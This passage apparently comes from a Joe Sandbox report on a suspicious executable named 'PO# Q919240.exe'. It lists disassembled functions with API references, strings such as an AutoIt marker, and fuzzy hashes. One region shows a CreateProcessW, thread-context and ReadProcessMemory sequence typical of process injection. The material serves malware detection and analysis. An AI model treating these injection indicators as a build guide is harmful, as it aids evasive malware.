                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: NamePath$Full_wcsncpy$DesktopFileFolderFromListMallocOpen
                • String ID: X$pWH
                • API String ID: 85490731-941433119
                • Opcode ID: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                • Instruction ID: b6f0e4d7e30e2857a1e9cc165fafff24640ac0dd2e9829c062eaf90218724cbe
                • Opcode Fuzzy Hash: 1b62eedeb2ba23f3a12794f4d72c3fd3ac9c0abd578206ca8986e50026ca9cbc
                • Instruction Fuzzy Hash: 1F118AB0A00244ABDB11EFD9DC457DEBBF95F45304F14842AE504AB392D7FD08498BA9
                Function 00401B10 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 41COMMON
                Download Yara Rule
                APIs
                • _wcslen.LIBCMT ref: 00401B11
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • _memmove.LIBCMT ref: 00401B57
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                  • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                  • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: std::exception::exception$Exception@8Throw_malloc_memmove_wcslen
                • String ID: @EXITCODE
                • API String ID: 2734553683-3436989551
                • Opcode ID: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                • Instruction ID: 16ac7666fc6b8d0cd4c8082de1062d74cbdf630d8e5b0a9ec9a55ac2b86b5c72
                • Opcode Fuzzy Hash: b6d17f11840b334af4eb2c0dc4703dd6ec7fe6b5974f9b569570c14fa5f7c58b
                • Instruction Fuzzy Hash: D5F0CDF2B00641AFD720DB36DC02B6775E49B84308F04883EA24BC6795FA7DE4828B14
                Function 00410100 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                Download Yara Rule
                Strings
                • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 0042804F
                • C:\Users\user\Desktop\PO# Q919240.exe, xrefs: 00410107
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _strcat
                • String ID: >>>AUTOIT NO CMDEXECUTE<<<$C:\Users\user\Desktop\PO# Q919240.exe
                • API String ID: 1765576173-230720181
                • Opcode ID: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                • Instruction ID: e645463cc19bd0c1a49bcabea2d674544a6c2f3c5714d62cb3526a870e150300
                • Opcode Fuzzy Hash: 9cf7010eca5106026e95a37c4c4993c7a48cbbbd0f5b26026c251fe95f3d7589
                • Instruction Fuzzy Hash: FBF090B390020D768B00F6E6D942CEFB37C9985704B5006AFA905B3152EA79EA0987B6
                Function 00475077 Relevance: 4.9, APIs: 3, Instructions: 390COMMON
                Download Yara Rule
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                • Instruction ID: 8c99b1ef877cebc7a747b8a97cc81d83a07aa3771b44d3adc2ea031a64448d8d
                • Opcode Fuzzy Hash: 7af5e299b258df5e9c9a2551ed0e7af6e1d4c875de24c7fdf76d77545964eae0
                • Instruction Fuzzy Hash: CEF18C716043019FC700DF29C884A5AB7E5FF88318F14C95EF9998B392D7B9E945CB86
                Function 00414ABA Relevance: 4.7, APIs: 3, Instructions: 160COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __filbuf__getptd_noexit__read_memcpy_s
                • String ID:
                • API String ID: 1794320848-0
                • Opcode ID: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                • Instruction ID: 2f36134af58cf06217a4581a57f76d3547d7b7b98d7afe96428f3577b7504850
                • Opcode Fuzzy Hash: b5af9ce9d8135965a8c163c1359f1833c669f36246c0dfec509ee2915f8c5eb0
                • Instruction Fuzzy Hash: 6C51E631A01208DBCB249F69C9446DFB7B1AFC0364F25826BE43597290E378EED1CB59
                Function 00475300 Relevance: 4.6, APIs: 3, Instructions: 141COMMON
                Download Yara Rule
                APIs
                • GetCurrentProcess.KERNEL32(00000000,?,00000067,000000FF), ref: 004753C7
                • TerminateProcess.KERNEL32(00000000), ref: 004753CE
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: Process$CurrentTerminate
                • String ID:
                • API String ID: 2429186680-0
                • Opcode ID: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                • Instruction ID: dddcdfafc98398d1c0f0a19edd80e49036cf45bbfca44c020541658de01b6296
                • Opcode Fuzzy Hash: aaa6002d905a33e4c3ceade7f85f71e7f986a1c67485104df61a1a5e3f63762c
                • Instruction Fuzzy Hash: 2C519D71604301AFC710DF65C881BABB7E5EF88308F14891EF9598B382D7B9D945CB96
                Function 0043213D Relevance: 4.5, APIs: 3, Instructions: 38COMMON
                Download Yara Rule
                APIs
                • _malloc.LIBCMT ref: 0043214B
                  • Part of subcall function 004135BB: __FF_MSGBANNER.LIBCMT ref: 004135D4
                  • Part of subcall function 004135BB: __NMSG_WRITE.LIBCMT ref: 004135DB
                  • Part of subcall function 004135BB: RtlAllocateHeap.NTDLL(00000000,00000001,?,?,?,?,004115F6,?,00401BAC,?,?,?), ref: 00413600
                • _malloc.LIBCMT ref: 0043215D
                • _malloc.LIBCMT ref: 0043216F
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _malloc$AllocateHeap
                • String ID:
                • API String ID: 680241177-0
                • Opcode ID: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                • Instruction ID: dac51259f70ca5acf95ac1b1a30df86389447b5c3122b5fc7e5239b6c816f1c7
                • Opcode Fuzzy Hash: ab61ccc74db86e6fcdeb904a32b1d9569ed7ac6f88b96914968634a5dd1a0039
                • Instruction Fuzzy Hash: A0F0E273200B142AD2206A6A6DC1BE7B39ADBD4765F00403FFB058A206DAE9988542EC
                Function 00467897 Relevance: 3.2, APIs: 2, Instructions: 170COMMON
                Download Yara Rule
                APIs
                • __wsplitpath.LIBCMT ref: 004678F7
                  • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                • GetLastError.KERNEL32(00000000,00000000), ref: 004679C7
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ErrorLast__wsplitpath_malloc
                • String ID:
                • API String ID: 4163294574-0
                • Opcode ID: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                • Instruction ID: 5ded281afda408fdcd401bf2365ceabb828b89a129c607e264fb1023d06c7d2e
                • Opcode Fuzzy Hash: b7e2b2e067b321cb14cd8dd870a284e502ce9d37bff932640fd458450c7e1011
                • Instruction Fuzzy Hash: FB5126712083018BD710EF75C881A5BB3E5AF84318F044A6EF9559B381EB39ED09CB97
                Function 0040F760 Relevance: 3.1, APIs: 2, Instructions: 92COMMON
                Download Yara Rule
                APIs
                  • Part of subcall function 0040F6F0: _wcslen.LIBCMT ref: 0040F705
                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,?,00454478,?,00000000,?,?), ref: 0040F71E
                  • Part of subcall function 0040F6F0: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,00000000,?,?,?,?), ref: 0040F747
                • _strcat.LIBCMT ref: 0040F786
                  • Part of subcall function 0040F850: _strlen.LIBCMT ref: 0040F858
                  • Part of subcall function 0040F850: _sprintf.LIBCMT ref: 0040F9AE
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ByteCharMultiWide$_sprintf_strcat_strlen_wcslen
                • String ID:
                • API String ID: 3199840319-0
                • Opcode ID: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                • Instruction ID: aac9d08775c2cbfae45fd546c2dd5c585d34072f6b495fb7426f91ad36779b1c
                • Opcode Fuzzy Hash: 49a3294527d5b305cfbd6c685c74412098d504eb7a2552fd7b1e5b305baf6987
                • Instruction Fuzzy Hash: 7B2148B260825027D724EF3A9C82A6EF2D4AF85304F14893FF555C22C2F738D554879A
                Function 0040D6B0 Relevance: 3.1, APIs: 2, Instructions: 74COMMON
                Download Yara Rule
                APIs
                • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0040D779
                • FreeLibrary.KERNEL32(?), ref: 0040D78E
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: FreeInfoLibraryParametersSystem
                • String ID:
                • API String ID: 3403648963-0
                • Opcode ID: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                • Instruction ID: 5fcdf068f8d8459ddaa7ea8882eac3df2259875866eaebb33036fc29c92b3e87
                • Opcode Fuzzy Hash: 1bcd72a0122d59f5f1ef4a441970033eb21b1c6439336685a4482ae7c853bb59
                • Instruction Fuzzy Hash: BB2184719083019FC300DF5ADC8190ABBE4FB84358F40493FF988A7392D735D9458B9A
                Function 0040F110 Relevance: 3.1, APIs: 2, Instructions: 51fileCOMMON
                Download Yara Rule
                APIs
                • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 0040F13A
                • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,0040DE74,?,00000001,?,00403423,?), ref: 00426326
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: CreateFile
                • String ID:
                • API String ID: 823142352-0
                • Opcode ID: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                • Instruction ID: 8a88c5525f76e0b0fff62cf48ad84dc7055e673dbb4ccc29545257d8619b8f55
                • Opcode Fuzzy Hash: 01c8104855b6be3cf9f3f51c38ffad3c9237c0860841684a852cd2675ef3d23e
                • Instruction Fuzzy Hash: 16011D70784310BAF2305A68DD0BF5266546B45B24F20473ABBE5BE2D1D2F86885870C
                Function 00414A46 Relevance: 3.0, APIs: 2, Instructions: 32COMMONLIBRARYCODE
                Download Yara Rule
                APIs
                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                • __lock_file.LIBCMT ref: 00414A8D
                  • Part of subcall function 00415471: __lock.LIBCMT ref: 00415496
                • __fclose_nolock.LIBCMT ref: 00414A98
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                • String ID:
                • API String ID: 2800547568-0
                • Opcode ID: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                • Instruction ID: d9443fdd3ee0a3059f5d17ec53abbfe2105cc8a5d10ddad395bff0ae1f283336
                • Opcode Fuzzy Hash: a5ee4eb6f63f5c531cf15d6f0d52328148e0080a1a420ce895dcb566fcff73ac
                • Instruction Fuzzy Hash: EEF0F6308417019AD710AB7588027EF37A09F41379F22864FA061961D1C73C85C29B5D
                Function 00414FE2 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                Download Yara Rule
                APIs
                • __lock_file.LIBCMT ref: 00415012
                • __ftell_nolock.LIBCMT ref: 0041501F
                  • Part of subcall function 00417F77: __getptd_noexit.LIBCMT ref: 00417F77
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: __ftell_nolock__getptd_noexit__lock_file
                • String ID:
                • API String ID: 2999321469-0
                • Opcode ID: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                • Instruction ID: e3e7bc223609ce985a1750c66bb322057640979a4505571362f253753ce4bf01
                • Opcode Fuzzy Hash: 5d7fd30e9bb4e6974f03027405c635b91b5e55acacb14f372dcacdb3af77c648
                • Instruction Fuzzy Hash: 64F03030900605EADB107FB5DD027EE3B70AF443A8F20825BB0259A0E1DB7C8AC29A59
                Function 042632FD Relevance: 1.9, APIs: 1, Instructions: 400processthreadCOMMON
                Download Yara Rule
                APIs
                • CreateProcessW.KERNELBASE(?,00000000), ref: 04263ABB
                • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 04263B51
                • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 04263B73
                Memory Dump Source
                • Source File: 00000000.00000002.1467809739.0000000004262000.00000040.00000020.00020000.00000000.sdmp, Offset: 04262000, based on PE: false
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_4262000_PO# Q919240.jbxd
                Similarity
                • API ID: Process$ContextCreateMemoryReadThreadWow64
                • String ID:
                • API String ID: 2438371351-0
                • Opcode ID: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                • Instruction ID: 1270154d70fdcf467f79b4323e2367497570575381312d4bad3893b132cec12b
                • Opcode Fuzzy Hash: 1e5ff81ed8f871418fabb2f1fb9f15c50bab29dc79b391b745a61db8bf218849
                • Instruction Fuzzy Hash: 6012DD24E24658C6EB24DF64D8507DEB232EF68300F1090E9910DEB7A4E77A5EC5CB5A
                Function 00402F00 Relevance: 1.6, APIs: 1, Instructions: 104COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                • Instruction ID: 6397ebbfaf442e519c955e074037b65107783079284990db5ef0c3dd021860ed
                • Opcode Fuzzy Hash: 224a1bccd0668171228bffd00b4e167e84225026459a60d9317a1c29c8a59c26
                • Instruction Fuzzy Hash: 36317371E00209EBDF009F52E9866AEFBF4FF40740F2189BED855E2650E7389990D759
                Function 00402780 Relevance: 1.6, APIs: 1, Instructions: 101COMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: _memmove
                • String ID:
                • API String ID: 4104443479-0
                • Opcode ID: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                • Instruction ID: 412edbf2df7bf8c64f36b821a583ca4e96a0f18e0b9aed18a790d0e499aeb9a1
                • Opcode Fuzzy Hash: 8b2818c8434b9a070bb7a9b9dd55d4aa8d61190f7c46d4f62081b3e0e63eee4f
                • Instruction Fuzzy Hash: 60319CB9600A21EFC714DF19C580A62F7E0FF08310B14C57ADA89CB795E774E892CB99
                Function 00410CFC Relevance: 1.6, APIs: 1, Instructions: 94memoryCOMMON
                Download Yara Rule
                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.1466419994.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000000.00000002.1466373991.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466482365.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466506777.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466526085.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466544591.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.1466574073.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_400000_PO# Q919240.jbxd
                Similarity
                • API ID: ProtectVirtual
                • String ID:
                • API String ID: 544645111-0
                • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                • Instruction ID: 21b87f0337b3904faf2e49e7d89a80b8c5538d611ad57d97d778efbd48141229
